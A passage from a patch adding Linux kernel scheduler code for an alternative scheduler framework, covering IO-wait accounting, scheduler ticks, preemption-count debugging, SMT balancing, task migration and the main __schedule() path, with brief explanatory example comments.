++ * governor, are using nonsensical data: they prefer shallow idle state
++ * selection for a CPU that has IO-wait, even though the waiting task might
++ * not even end up running on that CPU when it does become runnable.
++ */
++
++unsigned int nr_iowait_cpu(int cpu)
++{
++	return atomic_read(&cpu_rq(cpu)->nr_iowait);
++}
++
++/*
++ * IO-wait accounting, and how it's mostly bollocks (on SMP).
++ *
++ * The idea behind IO-wait accounting is to account the idle time that we could
++ * have spent running if it were not for IO. That is, if we were to improve the
++ * storage performance, we'd have a proportional reduction in IO-wait time.
++ *
++ * This all works nicely on UP, where, when a task blocks on IO, we account
++ * idle time as IO-wait, because if the storage were faster, it could've been
++ * running and we'd not be idle.
++ *
++ * This has been extended to SMP, by doing the same for each CPU. This however
++ * is broken.
++ *
++ * Imagine for instance the case where two tasks block on one CPU, only the one
++ * CPU will have IO-wait accounted, while the other has regular idle. Even
++ * though, if the storage were faster, both could've run at the same time,
++ * utilising both CPUs.
++ *
++ * This means, that when looking globally, the current IO-wait accounting on
++ * SMP is a lower bound, due to under-accounting.
++ *
++ * Worse, since the numbers are provided per CPU, they are sometimes
++ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
++ * associated with any one particular CPU; it can wake on a different CPU than it
++ * blocked on. This means the per CPU IO-wait number is meaningless.
++ *
++ * Task CPU affinities can make all that even more 'interesting'.
++ */
++
++unsigned int nr_iowait(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += nr_iowait_cpu(i);
++
++	return sum;
++}
++
++#ifdef CONFIG_SMP
++
++/*
++ * sched_exec - execve() is a valuable balancing opportunity, because at
++ * this point the task has the smallest effective memory and cache
++ * footprint.
++ */
++void sched_exec(void)
++{
++}
++
++#endif
++
++DEFINE_PER_CPU(struct kernel_stat, kstat);
++DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
++
++EXPORT_PER_CPU_SYMBOL(kstat);
++EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
++
++static inline void update_curr(struct rq *rq, struct task_struct *p)
++{
++	s64 ns = rq->clock_task - p->last_ran;
++
++	p->sched_time += ns;
++	cgroup_account_cputime(p, ns);
++	account_group_exec_runtime(p, ns);
++
++	p->time_slice -= ns;
++	p->last_ran = rq->clock_task;
++}
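++
++/*
++ * Worked example: if rq->clock_task advanced by 1,500,000ns since
++ * p->last_ran, update_curr() charges the task 1.5ms of runtime and
++ * shrinks p->time_slice by the same amount; once time_slice falls
++ * below RESCHED_NS, scheduler_task_tick() below asks for a resched.
++ */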
++
++/*
++ * Return accounted runtime for the task.
++ * Separately include the current task's pending runtime that has not
++ * been accounted yet.
++ */
++unsigned long long task_sched_runtime(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	u64 ns;
++
++#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
++	/*
++	 * 64-bit doesn't need locks to atomically read a 64-bit value.
++	 * So we have an optimization chance when the task's delta_exec is 0.
++	 * Reading ->on_cpu is racy, but this is ok.
++	 *
++	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
++	 * If we race with it entering CPU, unaccounted time is 0. This is
++	 * indistinguishable from the read occurring a few cycles earlier.
++	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
++	 * been accounted, so we're correct here as well.
++	 */
++	if (!p->on_cpu || !task_on_rq_queued(p))
++		return tsk_seruntime(p);
++#endif
++
++	rq = task_access_lock_irqsave(p, &lock, &flags);
++	/*
++	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
++	 * project cycles that may never be accounted to this
++	 * thread, breaking clock_gettime().
++	 */
++	if (p == rq->curr && task_on_rq_queued(p)) {
++		update_rq_clock(rq);
++		update_curr(rq, p);
++	}
++	ns = tsk_seruntime(p);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++	return ns;
++}
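++
++/*
++ * This is the value that e.g. clock_gettime(CLOCK_THREAD_CPUTIME_ID)
++ * ultimately reports, hence the care above not to project cycles that
++ * may never be accounted to this thread.
++ */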
++
++/* This manages tasks that have run out of timeslice during a scheduler_tick */
++static inline void scheduler_task_tick(struct rq *rq)
++{
++	struct task_struct *p = rq->curr;
++
++	if (is_idle_task(p))
++		return;
++
++	update_curr(rq, p);
++	cpufreq_update_util(rq, 0);
++
++	/*
++	 * Tasks that have less than RESCHED_NS of time slice left will be
++	 * rescheduled.
++	 */
++	if (p->time_slice >= RESCHED_NS)
++		return;
++	set_tsk_need_resched(p);
++	set_preempt_need_resched();
++}
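++
++/*
++ * Example: a task that enters the tick with less than RESCHED_NS of
++ * time slice left gets TIF_NEED_RESCHED set here and is switched out
++ * at the next preemption point; a task with a healthy slice runs on.
++ */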
++
++#ifdef CONFIG_SCHED_DEBUG
++static u64 cpu_resched_latency(struct rq *rq)
++{
++	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
++	u64 resched_latency, now = rq_clock(rq);
++	static bool warned_once;
++
++	if (sysctl_resched_latency_warn_once && warned_once)
++		return 0;
++
++	if (!need_resched() || !latency_warn_ms)
++		return 0;
++
++	if (system_state == SYSTEM_BOOTING)
++		return 0;
++
++	if (!rq->last_seen_need_resched_ns) {
++		rq->last_seen_need_resched_ns = now;
++		rq->ticks_without_resched = 0;
++		return 0;
++	}
++
++	rq->ticks_without_resched++;
++	resched_latency = now - rq->last_seen_need_resched_ns;
++	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
++		return 0;
++
++	warned_once = true;
++
++	return resched_latency;
++}
++
++static int __init setup_resched_latency_warn_ms(char *str)
++{
++	long val;
++
++	if ((kstrtol(str, 0, &val))) {
++		pr_warn("Unable to set resched_latency_warn_ms\n");
++		return 1;
++	}
++
++	sysctl_resched_latency_warn_ms = val;
++	return 1;
++}
++__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
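++
++/*
++ * Example: booting with "resched_latency_warn_ms=100" makes
++ * cpu_resched_latency() warn once a pending reschedule has been
++ * ignored for more than 100ms; a value of 0 disables the check.
++ */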
++#else
++static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
++#endif /* CONFIG_SCHED_DEBUG */
++
++/*
++ * This function gets called by the timer code, with HZ frequency.
++ * We call it with interrupts disabled.
++ */
++void scheduler_tick(void)
++{
++	int cpu __maybe_unused = smp_processor_id();
++	struct rq *rq = cpu_rq(cpu);
++	u64 resched_latency;
++
++	arch_scale_freq_tick();
++	sched_clock_tick();
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	scheduler_task_tick(rq);
++	if (sched_feat(LATENCY_WARN))
++		resched_latency = cpu_resched_latency(rq);
++	calc_global_load_tick(rq);
++
++	rq->last_tick = rq->clock;
++	raw_spin_unlock(&rq->lock);
++
++	if (sched_feat(LATENCY_WARN) && resched_latency)
++		resched_latency_warn(cpu, resched_latency);
++
++	perf_event_task_tick();
++}
++
++#ifdef CONFIG_SCHED_SMT
++static inline int sg_balance_cpu_stop(void *data)
++{
++	struct rq *rq = this_rq();
++	struct task_struct *p = data;
++	cpumask_t tmp;
++	unsigned long flags;
++
++	local_irq_save(flags);
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++
++	rq->active_balance = 0;
++	/* _something_ may have changed the task, double check again */
++	if (task_on_rq_queued(p) && task_rq(p) == rq &&
++	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
++	    !is_migration_disabled(p)) {
++		int cpu = cpu_of(rq);
++		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
++		rq = move_queued_task(rq, p, dcpu);
++	}
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock(&p->pi_lock);
++
++	local_irq_restore(flags);
++
++	return 0;
++}
++
++/* sg_balance_trigger - trigger sibling group balance for @cpu */
++static inline int sg_balance_trigger(const int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	struct task_struct *curr;
++	int res;
++
++	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
++		return 0;
++	curr = rq->curr;
++	res = !is_idle_task(curr) && (1 == rq->nr_running) &&
++	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&
++	      !is_migration_disabled(curr) && !rq->active_balance;
++
++	if (res)
++		rq->active_balance = 1;
++
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	if (res)
++		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
++				    &rq->active_balance_work);
++	return res;
++}
++
++/*
++ * sg_balance - sibling group balance check for run queue @rq
++ */
++static inline void sg_balance(struct rq *rq)
++{
++	cpumask_t chk;
++	int cpu = cpu_of(rq);
++
++	/* exit when cpu is offline */
++	if (unlikely(!rq->online))
++		return;
++
++	/*
++	 * Only a cpu in the sibling idle group will do the checking and then
++	 * find potential cpus which can migrate the currently running task
++	 */
++	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_rq_watermark) &&
++	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
++		int i;
++
++		for_each_cpu_wrap(i, &chk, cpu) {
++			if (cpumask_subset(cpu_smt_mask(i), &chk) &&
++			    sg_balance_trigger(i))
++				return;
++		}
++	}
++}
++#endif /* CONFIG_SCHED_SMT */
++
++#ifdef CONFIG_NO_HZ_FULL
++
++struct tick_work {
++	int			cpu;
++	atomic_t		state;
++	struct delayed_work	work;
++};
++/* Values for ->state, see diagram below. */
++#define TICK_SCHED_REMOTE_OFFLINE	0
++#define TICK_SCHED_REMOTE_OFFLINING	1
++#define TICK_SCHED_REMOTE_RUNNING	2
++
++/*
++ * State diagram for ->state:
++ *
++ *
++ *          TICK_SCHED_REMOTE_OFFLINE
++ *                    |   ^
++ *                    |   |
++ *                    |   | sched_tick_remote()
++ *                    |   |
++ *                    |   |
++ *                    +--TICK_SCHED_REMOTE_OFFLINING
++ *                    |   ^
++ *                    |   |
++ * sched_tick_start() |   | sched_tick_stop()
++ *                    |   |
++ *                    V   |
++ *          TICK_SCHED_REMOTE_RUNNING
++ *
++ *
++ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
++ * and sched_tick_start() are happy to leave the state in RUNNING.
++ */
++
++static struct tick_work __percpu *tick_work_cpu;
++
++static void sched_tick_remote(struct work_struct *work)
++{
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct tick_work *twork = container_of(dwork, struct tick_work, work);
++	int cpu = twork->cpu;
++	struct rq *rq = cpu_rq(cpu);
++	struct task_struct *curr;
++	unsigned long flags;
++	u64 delta;
++	int os;
++
++	/*
++	 * Handle the tick only if it appears the remote CPU is running in full
++	 * dynticks mode. The check is racy by nature, but missing a tick or
++	 * having one too many is no big deal because the scheduler tick updates
++	 * statistics and checks timeslices in a time-independent way, regardless
++	 * of when exactly it is running.
++	 */
++	if (!tick_nohz_tick_stopped_cpu(cpu))
++		goto out_requeue;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	curr = rq->curr;
++	if (cpu_is_offline(cpu))
++		goto out_unlock;
++
++	update_rq_clock(rq);
++	if (!is_idle_task(curr)) {
++		/*
++		 * Make sure the next tick runs within a reasonable
++		 * amount of time.
++		 */
++		delta = rq_clock_task(rq) - curr->last_ran;
++		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
++	}
++	scheduler_task_tick(rq);
++
++	calc_load_nohz_remote(rq);
++out_unlock:
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out_requeue:
++	/*
++	 * Run the remote tick once per second (1Hz). This arbitrary
++	 * frequency is large enough to avoid overload but short enough
++	 * to keep scheduler internal stats reasonably up to date.  But
++	 * first update state to reflect hotplug activity if required.
++	 */
++	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
++	if (os == TICK_SCHED_REMOTE_RUNNING)
++		queue_delayed_work(system_unbound_wq, dwork, HZ);
++}
++
++static void sched_tick_start(int cpu)
++{
++	int os;
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
++	if (os == TICK_SCHED_REMOTE_OFFLINE) {
++		twork->cpu = cpu;
++		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
++		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
++	}
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++static void sched_tick_stop(int cpu)
++{
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	cancel_delayed_work_sync(&twork->work);
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++int __init sched_tick_offload_init(void)
++{
++	tick_work_cpu = alloc_percpu(struct tick_work);
++	BUG_ON(!tick_work_cpu);
++	return 0;
++}
++
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_tick_start(int cpu) { }
++static inline void sched_tick_stop(int cpu) { }
++#endif
++
++#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
++				defined(CONFIG_PREEMPT_TRACER))
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just disabled preemption. Start timing the latency.
++ */
++static inline void preempt_latency_start(int val)
++{
++	if (preempt_count() == val) {
++		unsigned long ip = get_lock_parent_ip();
++#ifdef CONFIG_DEBUG_PREEMPT
++		current->preempt_disable_ip = ip;
++#endif
++		trace_preempt_off(CALLER_ADDR0, ip);
++	}
++}
++
++void preempt_count_add(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
++		return;
++#endif
++	__preempt_count_add(val);
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Spinlock count overflowing soon?
++	 */
++	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
++				PREEMPT_MASK - 10);
++#endif
++	preempt_latency_start(val);
++}
++EXPORT_SYMBOL(preempt_count_add);
++NOKPROBE_SYMBOL(preempt_count_add);
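++
++/*
++ * For example, preempt_disable() boils down to preempt_count_add(1):
++ * on the 0 -> 1 transition preempt_count() == val after the add, so
++ * preempt_latency_start() starts timing; nested disables do not.
++ */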
++
++/*
++ * If the value passed in equals the current preempt count
++ * then we just enabled preemption. Stop timing the latency.
++ */
++static inline void preempt_latency_stop(int val)
++{
++	if (preempt_count() == val)
++		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
++}
++
++void preempt_count_sub(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
++		return;
++	/*
++	 * Is the spinlock portion underflowing?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
++			!(preempt_count() & PREEMPT_MASK)))
++		return;
++#endif
++
++	preempt_latency_stop(val);
++	__preempt_count_sub(val);
++}
++EXPORT_SYMBOL(preempt_count_sub);
++NOKPROBE_SYMBOL(preempt_count_sub);
++
++#else
++static inline void preempt_latency_start(int val) { }
++static inline void preempt_latency_stop(int val) { }
++#endif
++
++static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	return p->preempt_disable_ip;
++#else
++	return 0;
++#endif
++}
++
++/*
++ * Print scheduling while atomic bug:
++ */
++static noinline void __schedule_bug(struct task_struct *prev)
++{
++	/* Save this before calling printk(), since that will clobber it */
++	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
++
++	if (oops_in_progress)
++		return;
++
++	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
++		prev->comm, prev->pid, preempt_count());
++
++	debug_show_held_locks(prev);
++	print_modules();
++	if (irqs_disabled())
++		print_irqtrace_events(prev);
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT) &&
++	    in_atomic_preempt_off()) {
++		pr_err("Preemption disabled at:");
++		print_ip_sym(KERN_ERR, preempt_disable_ip);
++	}
++	if (panic_on_warn)
++		panic("scheduling while atomic\n");
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++
++/*
++ * Various schedule()-time debugging checks and statistics:
++ */
++static inline void schedule_debug(struct task_struct *prev, bool preempt)
++{
++#ifdef CONFIG_SCHED_STACK_END_CHECK
++	if (task_stack_end_corrupted(prev))
++		panic("corrupted stack end detected inside scheduler\n");
++
++	if (task_scs_end_corrupted(prev))
++		panic("corrupted shadow stack detected inside scheduler\n");
++#endif
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
++		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
++			prev->comm, prev->pid, prev->non_block_count);
++		dump_stack();
++		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++	}
++#endif
++
++	if (unlikely(in_atomic_preempt_off())) {
++		__schedule_bug(prev);
++		preempt_count_set(PREEMPT_DISABLED);
++	}
++	rcu_sleep_check();
++	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
++
++	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
++
++	schedstat_inc(this_rq()->sched_count);
++}
++
++/*
++ * Compile time debug macro
++ * #define ALT_SCHED_DEBUG
++ */
++
++#ifdef ALT_SCHED_DEBUG
++void alt_sched_debug(void)
++{
++	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
++	       sched_rq_pending_mask.bits[0],
++	       sched_rq_watermark[0].bits[0],
++	       sched_sg_idle_mask.bits[0]);
++}
++#else
++inline void alt_sched_debug(void) {}
++#endif
++
++#ifdef	CONFIG_SMP
++
++#ifdef CONFIG_PREEMPT_RT
++#define SCHED_NR_MIGRATE_BREAK 8
++#else
++#define SCHED_NR_MIGRATE_BREAK 32
++#endif
++
++const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
++
++/*
++ * Migrate pending tasks in @rq to @dest_cpu
++ */
++static inline int
++migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
++{
++	struct task_struct *p, *skip = rq->curr;
++	int nr_migrated = 0;
++	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
++
++	while (skip != rq->idle && nr_tries &&
++	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
++		skip = sched_rq_next_task(p, rq);
++		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
++			__SCHED_DEQUEUE_TASK(p, rq, 0);
++			set_task_cpu(p, dest_cpu);
++			sched_task_sanity_check(p, dest_rq);
++			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
++			nr_migrated++;
++		}
++		nr_tries--;
++	}
++
++	return nr_migrated;
++}
++
++static inline int take_other_rq_tasks(struct rq *rq, int cpu)
++{
++	struct cpumask *topo_mask, *end_mask;
++
++	if (unlikely(!rq->online))
++		return 0;
++
++	if (cpumask_empty(&sched_rq_pending_mask))
++		return 0;
++
++	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
++	do {
++		int i;
++		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
++			int nr_migrated;
++			struct rq *src_rq;
++
++			src_rq = cpu_rq(i);
++			if (!do_raw_spin_trylock(&src_rq->lock))
++				continue;
++			spin_acquire(&src_rq->lock.dep_map,
++				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
++
++			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
++				src_rq->nr_running -= nr_migrated;
++				if (src_rq->nr_running < 2)
++					cpumask_clear_cpu(i, &sched_rq_pending_mask);
++
++				rq->nr_running += nr_migrated;
++				if (rq->nr_running > 1)
++					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
++
++				cpufreq_update_util(rq, 0);
++
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
++				return 1;
++			}
++
++			spin_release(&src_rq->lock.dep_map, _RET_IP_);
++			do_raw_spin_unlock(&src_rq->lock);
++		}
++	} while (++topo_mask < end_mask);
++
++	return 0;
++}
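++
++/*
++ * Note on the walk above: assuming the per-CPU topology masks are
++ * ordered from nearest (e.g. SMT siblings) to furthest, pending tasks
++ * are pulled from the closest busy runqueue first, and the scan stops
++ * at the first level that actually yields migrated tasks.
++ */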
++#endif
++
++/*
++ * Timeslices below RESCHED_NS are considered as good as expired as there's no
++ * point rescheduling when there's so little time left.
++ */
++static inline void check_curr(struct task_struct *p, struct rq *rq)
++{
++	if (unlikely(rq->idle == p))
++		return;
++
++	update_curr(rq, p);
++
++	if (p->time_slice < RESCHED_NS)
++		time_slice_expired(p, rq);
++}
++
++static inline struct task_struct *
++choose_next_task(struct rq *rq, int cpu, struct task_struct *prev)
++{
++	struct task_struct *next;
++
++	if (unlikely(rq->skip)) {
++		next = rq_runnable_task(rq);
++		if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++			if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++				rq->skip = NULL;
++				schedstat_inc(rq->sched_goidle);
++				return next;
++#ifdef	CONFIG_SMP
++			}
++			next = rq_runnable_task(rq);
++#endif
++		}
++		rq->skip = NULL;
++#ifdef CONFIG_HIGH_RES_TIMERS
++		hrtick_start(rq, next->time_slice);
++#endif
++		return next;
++	}
++
++	next = sched_rq_first_task(rq);
++	if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++		if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++			schedstat_inc(rq->sched_goidle);
++			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
++			return next;
++#ifdef	CONFIG_SMP
++		}
++		next = sched_rq_first_task(rq);
++#endif
++	}
++#ifdef CONFIG_HIGH_RES_TIMERS
++	hrtick_start(rq, next->time_slice);
++#endif
++	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
++	 * next);*/
++	return next;
++}
++
++/*
++ * Constants for the sched_mode argument of __schedule().
++ *
++ * The mode argument allows RT enabled kernels to differentiate a
++ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
++ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
++ * optimize the AND operation out and just check for zero.
++ */
++#define SM_NONE			0x0
++#define SM_PREEMPT		0x1
++#define SM_RTLOCK_WAIT		0x2
++
++#ifndef CONFIG_PREEMPT_RT
++# define SM_MASK_PREEMPT	(~0U)
++#else
++# define SM_MASK_PREEMPT	SM_PREEMPT
++#endif
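++
++/*
++ * E.g. on !PREEMPT_RT, "sched_mode & SM_MASK_PREEMPT" is
++ * "sched_mode & ~0U", which the compiler folds to plain sched_mode,
++ * so the extra mode bits cost nothing there.
++ */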
++
++/*
++ * schedule() is the main scheduler function.
++ *
++ * The main means of driving the scheduler and thus entering this function are:
++ *
++ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
++ *
++ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
++ *      paths. For example, see arch/x86/entry_64.S.
++ *
++ *      To drive preemption between tasks, the scheduler sets the flag in timer
++ *      interrupt handler scheduler_tick().
++ *
++ *   3. Wakeups don't really cause entry into schedule(). They add a
++ *      task to the run-queue and that's it.
++ *
++ *      Now, if the new task added to the run-queue preempts the current
++ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
++ *      called on the nearest possible occasion:
++ *
++ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
++ *
++ *         - in syscall or exception context, at the next outermost
++ *           preempt_enable(). (this might be as soon as the wake_up()'s
++ *           spin_unlock()!)
++ *
++ *         - in IRQ context, return from interrupt-handler to
++ *           preemptible context
++ *
++ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
++ *         then at the next:
++ *
++ *          - cond_resched() call
++ *          - explicit schedule() call
++ *          - return from syscall or exception to user-space
++ *          - return from interrupt-handler to user-space
++ *
++ * WARNING: must be called with preemption disabled!
++ */
++static void __sched notrace __schedule(unsigned int sched_mode)
++{
++	struct task_struct *prev, *next;
++	unsigned long *switch_count;
++	unsigned long prev_state;
++	struct rq *rq;
++	int cpu;
++	int deactivated = 0;
++
++	cpu = smp_processor_id();
++	rq = cpu_rq(cpu);
++	prev = rq->curr;
++
++	schedule_debug(prev, !!sched_mode);
++
++	/* bypassing the sched_feat(HRTICK) check, which Alt schedule FW doesn't support */
++	hrtick_clear(rq);
++
++	local_irq_disable();
++	rcu_note_context_switch(!!sched_mode);
++
++	/*
++	 * Make sure that signal_pending_state()->signal_pending() below
++	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
++	 * done by the caller to avoid the race with signal_wake_up():
++	 *
++	 * __set_current_state(@state)		signal_wake_up()
++	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
++	 *					  wake_up_state(p, state)
++	 *   LOCK rq->lock			    LOCK p->pi_state
++	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
++	 *     if (signal_pending_state())	    if (p->state & @state)
++	 *
++	 * Also, the membarrier system call requires a full memory barrier
++	 * after coming from user-space, before storing to rq->curr.
++	 */
++	raw_spin_lock(&rq->lock);
++	smp_mb__after_spinlock();
++
++	update_rq_clock(rq);
++
++	switch_count = &prev->nivcsw;
++	/*
++	 * We must load prev->state once (task_struct::state is volatile), such
++	 * that we form a control dependency vs deactivate_task() below.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
++		if (signal_pending_state(prev_state, prev)) {
++			WRITE_ONCE(prev->__state, TASK_RUNNING);
++		} else {
++			prev->sched_contributes_to_load =
++				(prev_state & TASK_UNINTERRUPTIBLE) &&
++				!(prev_state & TASK_NOLOAD) &&
++				!(prev->flags & TASK_FROZEN);
++
++			if (prev->sched_contributes_to_load)
++				rq->nr_uninterruptible++;
++
++			/*
++			 * __schedule()			ttwu()
++			 *   prev_state = prev->state;    if (p->on_rq && ...)
++			 *   if (prev_state)		    goto out;
++			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
++			 *				  p->state = TASK_WAKING
++			 *
++			 * Where __schedule() and ttwu() have matching control dependencies.
++			 *
++			 * After this, schedule() must not care about p->state any more.
++			 */
++			sched_task_deactivate(prev, rq);
++			deactivate_task(prev, rq);
++			deactivated = 1;
++
++			if (prev->in_iowait) {
++				atomic_inc(&rq->nr_iowait);
++				delayacct_blkio_start();
++			}
++		}
++		switch_count = &prev->nvcsw;
++	}
++
++	check_curr(prev, rq);
++
++	next = choose_next_task(rq, cpu, prev);
++	clear_tsk_need_resched(prev);
++	clear_preempt_need_resched();
++#ifdef CONFIG_SCHED_DEBUG
++	rq->last_seen_need_resched_ns = 0;
++#endif
++
++	if (likely(prev != next)) {
++		if (deactivated)
++			update_sched_rq_watermark(rq);
++		next->last_ran = rq->clock_task;
++		rq->last_ts_switch = rq->clock;
++
++		rq->nr_switches++;
++		/*
++		 * RCU users of rcu_dereference(rq->curr) may not see
++		 * changes to task_struct made by pick_next_task().
++		 */
++		RCU_INIT_POINTER(rq->curr, next);
++		/*
++		 * The membarrier system call requires each architecture
++		 * to have a full memory barrier after updating
++		 * rq->curr, before returning to user-space.
++		 *
++		 * Here are the schemes providing that barrier on the
++		 * various architectures:
++		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
++		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
++		 * - finish_lock_switch() for weakly-ordered
++		 *   architectures where spin_unlock is a full barrier,
++		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
++		 *   is a RELEASE barrier),
++		 */
++		++*switch_count;
++
++		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
++
++		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
++
++		/* Also unlocks the rq: */
++		rq = context_switch(rq, prev, next);
++	} else {
++		__balance_callbacks(rq);
++		raw_spin_unlock_irq(&rq->lock);
++	}
++
++#ifdef CONFIG_SCHED_SMT
++	sg_balance(rq);
++#endif
++}
++
++void __noreturn do_task_dead(void)
++{
++	/* Causes final put_task_struct in finish_task_switch(): */
++	set_special_state(TASK_DEAD);
++
++	/* Tell freezer to ignore us: */
++	current->flags |= PF_NOFREEZE;
++
++	__schedule(SM_NONE);
++	BUG();
++
++	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
++	for (;;)
++		cpu_relax();
++}
++
++static inline void sched_submit_work(struct task_struct *tsk)
++{
++	unsigned int task_flags;
++
++	if (task_is_running(tsk))
++		return;
++
++	task_flags = tsk->flags;
++	/*
++	 * If a worker goes to sleep, notify and ask workqueue whether it
++	 * wants to wake up a task to maintain concurrency.
++	 */
++	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (task_flags & PF_WQ_WORKER)
++			wq_worker_sleeping(tsk);
++		else
++			io_wq_worker_sleeping(tsk);
++	}
++
++	/*
++	 * spinlock and rwlock must not flush block requests.  This will
++	 * deadlock if the callback attempts to acquire a lock which is
++	 * already acquired.
++	 */
++	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
++
